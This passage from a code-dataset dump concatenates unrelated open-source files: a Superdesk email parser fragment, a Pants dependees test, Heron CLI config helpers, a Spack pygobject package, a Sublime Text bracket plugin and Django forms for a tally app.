date_tuple = email.utils.parsedate_tz(msg['Date'])
if date_tuple:
dt = datetime.datetime.utcfromtimestamp(
email.utils.mktime_tz(date_tuple))
dt = dt.replace(tzinfo=timezone('utc'))
item['firstcreated'] = dt
for part in msg.walk():
if part.get_content_type() == "text/plain":
body = part.get_payload(decode=True)
# if we don't know the charset just have a go!
if part.get_content_charset() is None:
json_str = body.decode().replace('\r\n', '').replace(' ', ' ')
else:
charset = part.get_content_charset()
json_str = body.decode(charset).replace('\r\n', '').replace(' ', ' ')
mail_item = dict((k, v[0]) for k, v in json.loads(json_str).items())
self._expand_category(item, mail_item)
item['original_source'] = mail_item.get('Username', mail_item.get('Email Address', ''))
item['headline'] = mail_item.get('Headline', '')
item['abstract'] = mail_item.get('Abstract', '')
item['slugline'] = mail_item.get('Slugline', '')
item['body_html'] = '<p>' + mail_item.get('Body', '').replace('\n', '</p><p>') + '</p>'
default_source = app.config.get('DEFAULT_SOURCE_VALUE_FOR_MANUAL_ARTICLES')
city = mail_item.get('Dateline', '')
cities = app.locators.find_cities()
located = [c for c in cities if c['city'].lower() == city.lower()]
item.setdefault('dateline', {})
item['dateline']['located'] = located[0] if len(located) > 0 else {'city_code': city,
'city': city,
'tz': 'UTC',
'dateline': 'city'}
item['dateline']['source'] = default_source
item['dateline']['text'] = format_dateline_to_locmmmddsrc(item['dateline']['located'],
get_date(item['firstcreated']),
source=default_source)
if mail_item.get('Priority') != '':
if mail_item.get('Priority', '3').isdigit():
item['priority'] = int(mail_item.get('Priority', '3'))
else:
priority_map = superdesk.get_resource_service('vocabularies').find_one(
req=None, _id='priority')
priorities = [x for x in priority_map.get('items', []) if
x['name'].upper() == mail_item.get('Priority', '').upper()]
if priorities is not None and len(priorities) > 0:
item['priority'] = int(priorities[0].get('qcode', '3'))
else:
item['priority'] = 3
if mail_item.get('News Value') != '':
item['urgency'] = int(mail_item.get('News Value', '3'))
# We expect the username passed corresponds to a superdesk user
query = {'email': re.compile(
'^{}$'.format(mail_item.get('Username', mail_item.get('Email Address', ''))),
re.IGNORECASE)}
user = superdesk.get_resource_service('users').find_one(req=None, **query)
if not user:
logger.error('Failed to find user for email {}'.format(
mail_item.get('Username', mail_item.get('Email Address', ''))))
raise UserNotRegisteredException()
item['original_creator'] = user.get('_id')
if BYLINE in user and user.get(BYLINE, ''):
item['byline'] = user.get(BYLINE)
item[SIGN_OFF] = user.get(SIGN_OFF)
# attempt to match the given desk name against the defined desks
query = {'name': re.compile('^{}$'.format(mail_item.get('Desk', '')), re.IGNORECASE)}
desk = superdesk.get_resource_service('desks').find_one(
req=None, **query)
if desk:
item['task'] = {'desk': desk.get('_id'), 'stage': desk.get('incoming_stage')}
if 'Place' in mail_item:
locator_map = superdesk.get_resource_service('vocabularies').find_one(req=None,
_id='locators')
place = [x for x in locator_map.get('items', []) if
x['qcode'] == mail_item.get('Place', '').upper()]
if place is not None:
item['place'] = place
if mail_item.get('Legal flag', '') == 'LEGAL':
item['flags'] = {'marked_for_legal': True}
break
return [item]
except Exception as ex:
raise IngestEmailError.emailParseError(ex, provider)
register_feed_parser(EMailRFC822FeedParser.NAME, EMailRFC822FeedParser())
| agpl-3.0 | 8,895,409,023,777,085,000 | 51.071247 | 117 | 0.449765 | false |
jtrobec/pants | tests/python/pants_test/backend/core/tasks/test_dependees.py | 1 | 7068 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from pants.backend.codegen.targets.java_thrift_library import JavaThriftLibrary
from pants.backend.core.targets.resources import Resources
from pants.backend.core.tasks.dependees import ReverseDepmap
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_jar_dependency import ScalaJarDependency
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_tests import PythonTests
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.build_graph.target import Target
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class BaseReverseDepmapTest(ConsoleTaskTestBase):
@classmethod
def task_type(cls):
return ReverseDepmap
def assert_console_output(self, *args, **kwargs):
# Ensure that the globally-registered spec_excludes option is set, as Dependees consults it.
options = {'spec_excludes': []}
if 'options' in kwargs:
options.update(kwargs['options'])
kwargs['options'] = options
return super(BaseReverseDepmapTest, self).assert_console_output(*args, **kwargs)
class ReverseDepmapEmptyTest(BaseReverseDepmapTest):
def test(self):
self.assert_console_output(targets=[])
class ReverseDepmapTest(BaseReverseDepmapTest):
@property
def alias_groups(self):
return BuildFileAliases(
targets={
'target': Target,
'jar_library': JarLibrary,
'java_library': JavaLibrary,
'java_thrift_library': JavaThriftLibrary,
'python_library': PythonLibrary,
'python_tests': PythonTests,
'resources': Resources,
},
objects={
'jar': JarDependency,
'scala_jar': ScalaJarDependency,
}
)
def setUp(self):
super(ReverseDepmapTest, self).setUp()
def add_to_build_file(path, name, alias=False, deps=()):
self.add_to_build_file(path, dedent("""
{type}(name='{name}',
dependencies=[{deps}]
)
""".format(
type='target' if alias else 'python_library',
name=name,
deps=','.join("'{0}'".format(dep) for dep in list(deps)))
))
add_to_build_file('common/a', 'a', deps=['common/d'])
add_to_build_file('common/b', 'b')
add_to_build_file('common/c', 'c')
add_to_build_file('common/d', 'd')
add_to_build_file('tests/d', 'd', deps=['common/d'])
add_to_build_file('overlaps', 'one', deps=['common/a', 'common/b'])
add_to_build_file('overlaps', 'two', deps=['common/a', 'common/c'])
add_to_build_file('overlaps', 'three', deps=['common/a', 'overlaps:one'])
add_to_build_file('overlaps', 'four', alias=True, deps=['common/b'])
add_to_build_file('overlaps', 'five', deps=['overlaps:four'])
self.add_to_build_file('resources/a', dedent("""
resources(
name='a_resources',
sources=['a.resource']
)
"""))
self.add_to_build_file('src/java/a', dedent("""
java_library(
name='a_java',
resources=['resources/a:a_resources']
)
"""))
    # Compile idl tests
self.add_to_build_file('src/thrift/example', dedent("""
java_thrift_library(
name='mybird',
compiler='scrooge',
language='scala',
sources=['1.thrift']
)
"""))
self.add_to_build_file('src/thrift/example', dedent("""
target(
name='compiled_scala',
dependencies=[
':mybird',
]
)
"""))
self.add_to_build_file('src/thrift/example', dedent("""
java_library(
name='compiled_java_user',
dependencies=[
':compiled_scala'
],
sources=['1.java'],
)
"""))
add_to_build_file('src/thrift/dependent', 'my-example', deps=['src/thrift/example:mybird'])
self.add_to_build_file('src/java/example', dedent("""
jar_library(
name='mybird-jars',
jars=[
jar(org='com', name='twitter')
],
)
"""))
    # External Dependency tests
self.add_to_build_file('src/java/example', dedent("""
java_library(
name='mybird',
dependencies=[':mybird-jars'],
sources=['1.java'],
)
"""))
self.add_to_build_file('src/java/example', dedent("""
java_library(
name='example2',
dependencies=[
':mybird',
],
sources=['2.java']
)
"""))
def test_roots(self):
self.assert_console_output(
'overlaps:two',
targets=[self.target('common/c')],
extra_targets=[self.target('common/a')]
)
def test_normal(self):
self.assert_console_output(
'overlaps:two',
targets=[self.target('common/c')]
)
def test_closed(self):
self.assert_console_output(
'overlaps:two',
'common/c:c',
targets=[self.target('common/c')],
options={'closed': True}
)
def test_transitive(self):
self.assert_console_output(
'overlaps:one',
'overlaps:three',
'overlaps:four',
'overlaps:five',
targets=[self.target('common/b')],
options={'transitive': True}
)
def test_nodups_dependees(self):
self.assert_console_output(
'overlaps:two',
'overlaps:three',
targets=[
self.target('common/a'),
self.target('overlaps:one')
],
)
def test_nodups_roots(self):
targets = [self.target('common/c')] * 2
self.assertEqual(2, len(targets))
self.assert_console_output(
'overlaps:two',
'common/c:c',
targets=targets,
options={'closed': True}
)
def test_aliasing(self):
self.assert_console_output(
'overlaps:five',
targets=[self.target('overlaps:four')]
)
def test_compile_idls(self):
self.assert_console_output(
'src/thrift/dependent:my-example',
'src/thrift/example:compiled_scala',
targets=[
self.target('src/thrift/example:mybird'),
],
)
def test_external_dependency(self):
self.assert_console_output(
'src/java/example:example2',
targets=[self.target('src/java/example:mybird')]
)
def test_resources_dependees(self):
self.assert_console_output(
'src/java/a:a_java',
targets=[self.target('resources/a:a_resources')]
)
def test_with_spec_excludes(self):
self.assert_console_output(
'overlaps:one',
'overlaps:two',
'overlaps:three',
targets=[self.target('common/a')]
)
self.assert_console_output(
targets=[self.target('common/a')],
options={'spec_excludes': ['overlaps']}
)
| apache-2.0 | -5,422,344,793,211,565,000 | 27.047619 | 96 | 0.614884 | false |
cherrygirl/micronaet-mx8 | l10n_it_ddt_report_aeroo/report/__init__.py | 3 | 1203 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
# Copyright(c)2008-2010 SIA "KN dati".(http://kndati.lv) All Rights Reserved.
# General contacts <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import ddt_parser
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,866,673,099,820,616,000 | 43.555556 | 80 | 0.613466 | false |
huijunwu/heron | heron/tools/common/src/python/utils/config.py | 1 | 16852 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''config.py: util functions for config, mainly for heron-cli'''
import argparse
import contextlib
import getpass
import os
import sys
import subprocess
import tarfile
import tempfile
import yaml
from heron.common.src.python.utils.log import Log
# pylint: disable=logging-not-lazy
# default environ tag, if not provided
ENVIRON = "default"
# directories for heron distribution
BIN_DIR = "bin"
CONF_DIR = "conf"
ETC_DIR = "etc"
LIB_DIR = "lib"
CLI_DIR = ".heron"
RELEASE_YAML = "release.yaml"
ZIPPED_RELEASE_YAML = "scripts/packages/release.yaml"
OVERRIDE_YAML = "override.yaml"
# mode of deployment
DIRECT_MODE = 'direct'
SERVER_MODE = 'server'
# directories for heron sandbox
SANDBOX_CONF_DIR = "./heron-conf"
# config file for heron cli
CLIENT_YAML = "client.yaml"
# client configs for role and env for direct deployment
ROLE_REQUIRED = "heron.config.is.role.required"
ENV_REQUIRED = "heron.config.is.env.required"
# client config for role and env for server deployment
ROLE_KEY = "role.required"
ENVIRON_KEY = "env.required"
def create_tar(tar_filename, files, config_dir, config_files):
'''
Create a tar file with a given set of files
'''
with contextlib.closing(tarfile.open(tar_filename, 'w:gz', dereference=True)) as tar:
for filename in files:
if os.path.isfile(filename):
tar.add(filename, arcname=os.path.basename(filename))
else:
raise Exception("%s is not an existing file" % filename)
if os.path.isdir(config_dir):
tar.add(config_dir, arcname=get_heron_sandbox_conf_dir())
else:
raise Exception("%s is not an existing directory" % config_dir)
for filename in config_files:
if os.path.isfile(filename):
arcfile = os.path.join(get_heron_sandbox_conf_dir(), os.path.basename(filename))
tar.add(filename, arcname=arcfile)
else:
raise Exception("%s is not an existing file" % filename)
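# Illustrative usage (paths and file names are hypothetical):
#   create_tar('topology.tar.gz', ['heron-examples.jar'], '/path/to/conf',
#              ['override.yaml'])
# bundles the listed files at the archive root and places the config directory
# and extra config files under the sandbox conf directory ('./heron-conf'),
# raising an Exception for anything that does not exist.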
def get_subparser(parser, command):
'''
Retrieve the given subparser from parser
'''
# pylint: disable=protected-access
subparsers_actions = [action for action in parser._actions
if isinstance(action, argparse._SubParsersAction)]
# there will probably only be one subparser_action,
# but better save than sorry
for subparsers_action in subparsers_actions:
# get all subparsers
for choice, subparser in list(subparsers_action.choices.items()):
if choice == command:
return subparser
return None
def cygpath(x):
'''
normalized class path on cygwin
'''
command = ['cygpath', '-wp', x]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()
output = result[0]
lines = output.split("\n")
return lines[0]
def identity(x):
'''
identity function
'''
return x
def normalized_class_path(x):
'''
normalize path
'''
if sys.platform == 'cygwin':
return cygpath(x)
return identity(x)
def get_classpath(jars):
'''
Get the normalized class path of all jars
'''
return ':'.join(map(normalized_class_path, jars))
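# Example (illustrative paths): get_classpath(['/opt/heron/lib/a.jar',
# '/opt/heron/lib/b.jar']) returns '/opt/heron/lib/a.jar:/opt/heron/lib/b.jar';
# on cygwin each path is first converted with cygpath.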
def get_heron_dir():
"""
This will extract heron directory from .pex file.
For example,
when __file__ is '/Users/heron-user/bin/heron/heron/tools/common/src/python/utils/config.pyc', and
its real path is '/Users/heron-user/.heron/bin/heron/tools/common/src/python/utils/config.pyc',
the internal variable ``path`` would be '/Users/heron-user/.heron', which is the heron directory
This means the variable `go_above_dirs` below is 9.
:return: root location of the .pex file
"""
go_above_dirs = 9
path = "/".join(os.path.realpath(__file__).split('/')[:-go_above_dirs])
return normalized_class_path(path)
def get_zipped_heron_dir():
"""
This will extract heron directory from .pex file,
with `zip_safe = False' Bazel flag added when building this .pex file
For example,
when __file__'s real path is
'/Users/heron-user/.pex/code/xxxyyy/heron/tools/common/src/python/utils/config.pyc', and
the internal variable ``path`` would be '/Users/heron-user/.pex/code/xxxyyy/',
which is the root PEX directory
This means the variable `go_above_dirs` below is 7.
:return: root location of the .pex file.
"""
go_above_dirs = 7
path = "/".join(os.path.realpath(__file__).split('/')[:-go_above_dirs])
return normalized_class_path(path)
################################################################################
# Get the root of heron dir and various sub directories depending on platform
################################################################################
def get_heron_bin_dir():
"""
This will provide heron bin directory from .pex file.
:return: absolute path of heron lib directory
"""
bin_path = os.path.join(get_heron_dir(), BIN_DIR)
return bin_path
def get_heron_conf_dir():
"""
This will provide heron conf directory from .pex file.
:return: absolute path of heron conf directory
"""
conf_path = os.path.join(get_heron_dir(), CONF_DIR)
return conf_path
def get_heron_lib_dir():
"""
This will provide heron lib directory from .pex file.
:return: absolute path of heron lib directory
"""
lib_path = os.path.join(get_heron_dir(), LIB_DIR)
return lib_path
def get_heron_release_file():
"""
This will provide the path to heron release.yaml file
:return: absolute path of heron release.yaml file in CLI
"""
return os.path.join(get_heron_dir(), RELEASE_YAML)
def get_zipped_heron_release_file():
"""
This will provide the path to heron release.yaml file.
To be used for .pex file built with `zip_safe = False` flag.
For example, `heron-ui'.
:return: absolute path of heron release.yaml file
"""
return os.path.join(get_zipped_heron_dir(), ZIPPED_RELEASE_YAML)
def get_heron_cluster_conf_dir(cluster, default_config_path):
"""
This will provide heron cluster config directory, if config path is default
:return: absolute path of heron cluster conf directory
"""
return os.path.join(default_config_path, cluster)
def get_heron_sandbox_conf_dir():
"""
This will provide heron conf directory in the sandbox
:return: relative path of heron sandbox conf directory
"""
return SANDBOX_CONF_DIR
def get_heron_libs(local_jars):
"""Get all the heron lib jars with the absolute paths"""
heron_lib_dir = get_heron_lib_dir()
heron_libs = [os.path.join(heron_lib_dir, f) for f in local_jars]
return heron_libs
def get_heron_cluster(cluster_role_env):
"""Get the cluster to which topology is submitted"""
return cluster_role_env.split('/')[0]
################################################################################
# pylint: disable=too-many-branches,superfluous-parens
def parse_cluster_role_env(cluster_role_env, config_path):
"""Parse cluster/[role]/[environ], supply default, if not provided, not required"""
parts = cluster_role_env.split('/')[:3]
if not os.path.isdir(config_path):
Log.error("Config path cluster directory does not exist: %s" % config_path)
raise Exception("Invalid config path")
# if cluster/role/env is not completely provided, check further
if len(parts) < 3:
cli_conf_file = os.path.join(config_path, CLIENT_YAML)
# if client conf doesn't exist, use default value
if not os.path.isfile(cli_conf_file):
if len(parts) == 1:
parts.append(getpass.getuser())
if len(parts) == 2:
parts.append(ENVIRON)
else:
cli_confs = {}
with open(cli_conf_file, 'r') as conf_file:
tmp_confs = yaml.load(conf_file)
# the return value of yaml.load can be None if conf_file is an empty file
if tmp_confs is not None:
cli_confs = tmp_confs
else:
print("Failed to read: %s due to it is empty" % (CLIENT_YAML))
# if role is required but not provided, raise exception
if len(parts) == 1:
if (ROLE_REQUIRED in cli_confs) and (cli_confs[ROLE_REQUIRED] is True):
raise Exception("role required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ROLE_REQUIRED, cli_conf_file))
else:
parts.append(getpass.getuser())
# if environ is required but not provided, raise exception
if len(parts) == 2:
if (ENV_REQUIRED in cli_confs) and (cli_confs[ENV_REQUIRED] is True):
raise Exception("environ required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ENV_REQUIRED, cli_conf_file))
else:
parts.append(ENVIRON)
  # if cluster or role or environ is empty, print an error and exit
  if len(parts[0]) == 0 or len(parts[1]) == 0 or len(parts[2]) == 0:
    print("Failed to parse %s: cluster, role and environ must all be non-empty" % cluster_role_env)
sys.exit(1)
return (parts[0], parts[1], parts[2])
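# Illustrative behaviour (cluster/role/env values are made up): when client.yaml
# does not mark role or env as required, parse_cluster_role_env('local', path)
# returns ('local', <current user>, 'default'), while
# parse_cluster_role_env('local/ads/devel', path) returns ('local', 'ads', 'devel').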
################################################################################
def get_cluster_role_env(cluster_role_env):
"""Parse cluster/[role]/[environ], supply empty string, if not provided"""
parts = cluster_role_env.split('/')[:3]
if len(parts) == 3:
return (parts[0], parts[1], parts[2])
if len(parts) == 2:
return (parts[0], parts[1], "")
if len(parts) == 1:
return (parts[0], "", "")
return ("", "", "")
################################################################################
def direct_mode_cluster_role_env(cluster_role_env, config_path):
"""Check cluster/[role]/[environ], if they are required"""
# otherwise, get the client.yaml file
cli_conf_file = os.path.join(config_path, CLIENT_YAML)
# if client conf doesn't exist, use default value
if not os.path.isfile(cli_conf_file):
return True
client_confs = {}
with open(cli_conf_file, 'r') as conf_file:
client_confs = yaml.load(conf_file)
# the return value of yaml.load can be None if conf_file is an empty file
if not client_confs:
return True
# if role is required but not provided, raise exception
  role_present = len(cluster_role_env[1]) > 0
if ROLE_REQUIRED in client_confs and client_confs[ROLE_REQUIRED] and not role_present:
raise Exception("role required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ROLE_REQUIRED, cli_conf_file))
# if environ is required but not provided, raise exception
  environ_present = len(cluster_role_env[2]) > 0
if ENV_REQUIRED in client_confs and client_confs[ENV_REQUIRED] and not environ_present:
raise Exception("environ required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ENV_REQUIRED, cli_conf_file))
return True
################################################################################
def server_mode_cluster_role_env(cluster_role_env, config_map):
"""Check cluster/[role]/[environ], if they are required"""
cmap = config_map[cluster_role_env[0]]
# if role is required but not provided, raise exception
  role_present = len(cluster_role_env[1]) > 0
if ROLE_KEY in cmap and cmap[ROLE_KEY] and not role_present:
raise Exception("role required but not provided (cluster/role/env = %s)."\
% (cluster_role_env))
# if environ is required but not provided, raise exception
  environ_present = len(cluster_role_env[2]) > 0
if ENVIRON_KEY in cmap and cmap[ENVIRON_KEY] and not environ_present:
raise Exception("environ required but not provided (cluster/role/env = %s)."\
% (cluster_role_env))
return True
################################################################################
def defaults_cluster_role_env(cluster_role_env):
"""
if role is not provided, supply userid
if environ is not provided, supply 'default'
"""
if len(cluster_role_env[1]) == 0 and len(cluster_role_env[2]) == 0:
return (cluster_role_env[0], getpass.getuser(), ENVIRON)
return (cluster_role_env[0], cluster_role_env[1], cluster_role_env[2])
################################################################################
# Parse the command line for overriding the defaults
################################################################################
def parse_override_config_and_write_file(namespace):
"""
Parse the command line for overriding the defaults and
create an override file.
"""
overrides = parse_override_config(namespace)
try:
tmp_dir = tempfile.mkdtemp()
override_config_file = os.path.join(tmp_dir, OVERRIDE_YAML)
with open(override_config_file, 'w') as f:
f.write(yaml.dump(overrides))
return override_config_file
except Exception as e:
raise Exception("Failed to parse override config: %s" % str(e))
def parse_override_config(namespace):
"""Parse the command line for overriding the defaults"""
overrides = dict()
for config in namespace:
kv = config.split("=")
if len(kv) != 2:
raise Exception("Invalid config property format (%s) expected key=value" % config)
if kv[1] in ['true', 'True', 'TRUE']:
overrides[kv[0]] = True
elif kv[1] in ['false', 'False', 'FALSE']:
overrides[kv[0]] = False
else:
overrides[kv[0]] = kv[1]
return overrides
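# Example (keys are illustrative): parse_override_config(['heron.verbose=true',
# 'heron.cpu=2']) returns {'heron.verbose': True, 'heron.cpu': '2'}; only
# true/false spellings become booleans, everything else stays a string.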
def get_java_path():
"""Get the path of java executable"""
java_home = os.environ.get("JAVA_HOME")
return os.path.join(java_home, BIN_DIR, "java")
def check_java_home_set():
"""Check if the java home set"""
# check if environ variable is set
if "JAVA_HOME" not in os.environ:
Log.error("JAVA_HOME not set")
return False
# check if the value set is correct
java_path = get_java_path()
if os.path.isfile(java_path) and os.access(java_path, os.X_OK):
return True
Log.error("JAVA_HOME/bin/java either does not exist or not an executable")
return False
def check_release_file_exists():
"""Check if the release.yaml file exists"""
release_file = get_heron_release_file()
# if the file does not exist and is not a file
if not os.path.isfile(release_file):
Log.error("Required file not found: %s" % release_file)
return False
return True
def print_build_info(zipped_pex=False):
"""Print build_info from release.yaml
:param zipped_pex: True if the PEX file is built with flag `zip_safe=False'.
"""
if zipped_pex:
release_file = get_zipped_heron_release_file()
else:
release_file = get_heron_release_file()
with open(release_file) as release_info:
release_map = yaml.load(release_info)
release_items = sorted(list(release_map.items()), key=lambda tup: tup[0])
for key, value in release_items:
print("%s : %s" % (key, value))
def get_version_number(zipped_pex=False):
"""Print version from release.yaml
:param zipped_pex: True if the PEX file is built with flag `zip_safe=False'.
"""
if zipped_pex:
release_file = get_zipped_heron_release_file()
else:
release_file = get_heron_release_file()
with open(release_file) as release_info:
for line in release_info:
trunks = line[:-1].split(' ')
if trunks[0] == 'heron.build.version':
return trunks[-1].replace("'", "")
return 'unknown'
def insert_bool(param, command_args):
'''
:param param:
:param command_args:
:return:
'''
index = 0
found = False
for lelem in command_args:
if lelem == '--' and not found:
break
if lelem == param:
found = True
break
index = index + 1
if found:
command_args.insert(index + 1, 'True')
return command_args
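# Example (arguments are illustrative):
#   insert_bool('--verbose', ['--verbose', '--config-path', 'conf'])
# returns ['--verbose', 'True', '--config-path', 'conf']; occurrences after a
# bare '--' separator are left untouched.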
def insert_bool_values(command_line_args):
'''
:param command_line_args:
:return:
'''
args1 = insert_bool('--verbose', command_line_args)
args2 = insert_bool('--deploy-deactivated', args1)
return args2
class SubcommandHelpFormatter(argparse.RawDescriptionHelpFormatter):
def _format_action(self, action):
# pylint: disable=bad-super-call
parts = super(argparse.RawDescriptionHelpFormatter, self)._format_action(action)
if action.nargs == argparse.PARSER:
parts = "\n".join(parts.split("\n")[1:])
return parts
| apache-2.0 | 7,029,551,338,896,319,000 | 30.97723 | 100 | 0.646689 | false |
mfherbst/spack | var/spack/repos/builtin/packages/py-pygobject/package.py | 5 | 2283 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPygobject(AutotoolsPackage):
"""bindings for the GLib, and GObject,
to be used in Python."""
homepage = "https://pypi.python.org/pypi/pygobject"
url = "http://ftp.gnome.org/pub/GNOME/sources/pygobject/2.28/pygobject-2.28.6.tar.bz2"
version('2.28.6', 'a43d783228dd32899e6908352b8308f3')
version('2.28.3', 'aa64900b274c4661a5c32e52922977f9')
extends('python')
depends_on('pkgconfig', type=('build'))
depends_on("libffi")
depends_on('glib')
depends_on('py-py2cairo', type=('build', 'run'))
depends_on('gobject-introspection')
patch('pygobject-2.28.6-introspection-1.patch', when='@2.28.3:2.28.6')
# patch from https://raw.githubusercontent.com/NixOS/nixpkgs/master/pkgs/development/python-modules/pygobject/pygobject-2.28.6-gio-types-2.32.patch
# for https://bugzilla.gnome.org/show_bug.cgi?id=668522
patch('pygobject-2.28.6-gio-types-2.32.patch', when='@2.28.6')
def install(self, spec, prefix):
make('install', parallel=False)
| lgpl-2.1 | -5,986,603,020,777,331,000 | 41.277778 | 151 | 0.674551 | false |
naokimiyasaka/sublime-text | Backup/20130918101225/BracketHighlighter/bh_modules/tagattrselect.py | 8 | 1881 | import bh_plugin
class SelectAttr(bh_plugin.BracketPluginCommand):
def run(self, edit, name, direction='right'):
if self.left.size() <= 1:
return
tag_name = r'[\w\:\-]+'
attr_name = r'''([\w\-\.:]+)(?:\s*=\s*(?:(?:"((?:\.|[^"])*)")|(?:'((?:\.|[^'])*)')|([^>\s]+)))?'''
tname = self.view.find(tag_name, self.left.begin)
current = self.selection[0].b
region = self.view.find(attr_name, tname.b)
selection = self.selection
if direction == 'left':
last = None
# Keep track of last attr
if region != None and current <= region.b and region.b < self.left.end:
last = region
while region != None and region.b < self.left.end:
# Select attribute until you have closest to the left of selection
if current > region.b:
selection = [region]
last = None
# Update last attr
elif last != None:
last = region
region = self.view.find(attr_name, region.b)
# Wrap right
if last != None:
selection = [last]
else:
first = None
# Keep track of first attr
if region != None and region.b < self.left.end:
first = region
while region != None and region.b < self.left.end:
# Select closest attr to the right of the selection
if current < region.b:
selection = [region]
first = None
break
region = self.view.find(attr_name, region.b)
# Wrap left
if first != None:
selection = [first]
self.selection = selection
def plugin():
return SelectAttr
| mit | -4,504,091,623,196,249,600 | 33.833333 | 106 | 0.472621 | false |
teknologkoren/Strequelistan | strecklista/forms.py | 1 | 4378 | from django import forms
from django.core.exceptions import ValidationError
from django.forms import DateInput, DateTimeInput, ModelForm
from datetime import datetime, timedelta
from .models import Quote, RegisterRequest, Suggestion
class LoginForm(forms.Form):
username = forms.CharField(
label="Username",
required=True,
max_length=50,
widget=forms.TextInput(attrs={'class': 'form-control', 'id': 'inputUsername', 'placeholder': 'username'})
)
password = forms.CharField(
label="Password",
max_length=50,
required=True,
widget=forms.PasswordInput(attrs={'class': 'form-control', 'id': 'inputPassword', 'placeholder': 'password'})
)
class QuoteForm(forms.Form):
text = forms.CharField(
label="text",
required=True,
max_length=4098,
widget=forms.TextInput(
attrs={'class': 'form-control', 'id': 'inputUsername', 'aria-describedby': 'basic-addon1'})
)
name = forms.CharField(
label="name",
required=True,
max_length=250,
widget=forms.TextInput(
attrs={'class': 'form-control', 'id': 'inputUsername', 'aria-describedby': 'basic-addon1'})
)
def clean(self):
form_data = self.cleaned_data
try:
if Quote.objects.filter(text=form_data['text'], who=form_data['name']).exists():
raise ValidationError("Quote already exists")
except:
raise ValidationError("Not enough arguments")
return form_data
class BulkTransactionForm(forms.Form):
amount=forms.DecimalField(
required=True,
max_value=20000,
max_digits=6,
label="blargh",
initial=0
)
user_id = forms.IntegerField(
required=True,
widget = forms.HiddenInput()
)
message = forms.CharField(
required=True,
initial="Admin transaction"
)
class ReturnTransactionForm(forms.Form):
transaction_id = forms.DecimalField(
required=True,
)
class TransactionDateForm(forms.Form):
start_date = forms.DateField(initial=datetime.now()-timedelta(days=60))
end_date = forms.DateField(initial=datetime.now())
class Meta:
fields = '__all__'
widgets = {
'start_date': DateTimeInput(),
'end_date': DateTimeInput(),
}
class heddaHopperForm(forms.Form):
where = forms.CharField(
max_length=255,
widget=forms.TextInput(
attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}
),
required=False,
)
when = forms.CharField(
max_length=255,
widget=forms.TextInput(
attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'},
),
required=False,
)
what = forms.CharField(
max_length=4000,
widget=forms.TextInput(
attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}
),
required=True,
)
class RegisterRequestForm(forms.Form):
first_name = forms.CharField(
max_length=50,
required=True,
widget=forms.TextInput(
attrs={'class': 'form-control'}
),
)
last_name = forms.CharField(
max_length = 50,
required=True,
widget=forms.TextInput(
attrs={'class': 'form-control'}
),
)
email = forms.EmailField(
max_length=255,
required=True,
widget=forms.TextInput(
attrs={'class': 'form-control'}
),
)
message = forms.CharField(
max_length=500,
required=False,
widget=forms.Textarea(
attrs={'class': 'form-control'}
),
)
class SuggestionForm(forms.ModelForm):
class Meta:
model = Suggestion
fields = ['name', 'description', 'price', 'link']
widgets = {
'name': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
'description': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
'price': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
'link': forms.TextInput(attrs={'class': 'form-control', 'aria-describedby': 'basic-addon1'}),
}
